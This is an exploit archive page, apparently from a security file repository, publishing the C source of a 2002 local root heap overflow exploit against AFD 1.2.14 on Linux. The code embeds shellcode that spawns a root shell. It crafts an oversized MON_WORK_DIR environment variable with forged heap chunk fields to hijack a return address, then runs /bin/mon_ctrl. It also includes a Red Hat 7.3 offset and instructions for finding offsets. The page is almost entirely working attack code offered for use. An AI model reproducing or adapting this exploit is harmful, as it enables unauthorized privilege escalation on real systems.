afd-expl.c

afd-expl.c: Posted Sep 6, 2002; Authored by eSDee, netric | Site netric.org; AFD v1.2.14 local root heap overflow exploit. Includes offset for Redhat 7.3 and instructions for finding offsets.; tags | exploit, overflow, local, root; systems | linux, redhat; SHA-256 | ba11ab3a60f47300732402f63f4607eedc8d209f484e0f0110e129539aaa8781; Download | Favorite | View

afd-expl.c

/* AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)
 * (Bug found by Sacrine (sacrine@netric.org)
 * -----------------------------------------------------------------
 * usage: ./afd-expl [retloc] [ret]
 * 
 * This exploit overwrites a saved return address on the stack,
 * so that 0xbfffe360, (that worked for me on Redhat 7.3) will
 * probally not work for you...
 * 
 * Just open the coredump, search the stack for 0x4207ac24, 
 * and substract that address with 0x0c.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] = 
        "\xeb\x0a" /* 10-byte-jump; setreuid(0,0); execve /bin/sh; exit(0); */
        "--netric--"
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
        "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
        "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";


int
main(int argc, char *argv[])
{
  char buffer[1135];

  unsigned int retloc     = 0xbfffe360;
  unsigned int ret        = 0x0806f020; /* &shellcode */

  if (argc > 1) retloc  = strtoul(argv[1], &argv[1], 16);
  if (argc > 2) ret  = strtoul(argv[2], &argv[2], 16);

  memset(buffer, 0x41, sizeof(buffer));
  memcpy(buffer, "MON_WORK_DIR=",13);
  memcpy(buffer+13, shellcode, strlen(shellcode));

  buffer[1117] = 0xff; /* prev_size */
  buffer[1118] = 0xff;
  buffer[1119] = 0xff;
  buffer[1120] = 0xff;

  buffer[1121] = 0xfc; /* size field */
  buffer[1122] = 0xff;
  buffer[1123] = 0xff;
  buffer[1124] = 0xff;

  buffer[1126] = (retloc & 0x000000ff); /* FD */
  buffer[1127] = (retloc & 0x0000ff00) >> 8;
  buffer[1128] = (retloc & 0x00ff0000) >> 16;
  buffer[1129] = (retloc & 0xff000000) >> 24;

  buffer[1130] = (ret & 0x000000ff); /* BK */
  buffer[1131] = (ret & 0x0000ff00) >> 8;
  buffer[1132] = (ret & 0x00ff0000) >> 16;
  buffer[1133] = (ret & 0xff000000) >> 24;

  buffer[1134] = 0x0;
  putenv(buffer);

  fprintf(stdout, "AFD 1.2.14 local root exploit by eSDee of Netric (www.netric.org)\n");
  fprintf(stdout, "-----------------------------------------------------------------\n");
  fprintf(stdout, "Ret    = 0x%08x\n", ret);
  fprintf(stdout, "Retloc = 0x%08x\n", retloc);

  execl("/bin/mon_ctrl", "mon_ctrl", NULL);
  return 0;
}

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

afd-expl.c

afd-expl.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

afd-expl.c

Share This

afd-expl.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems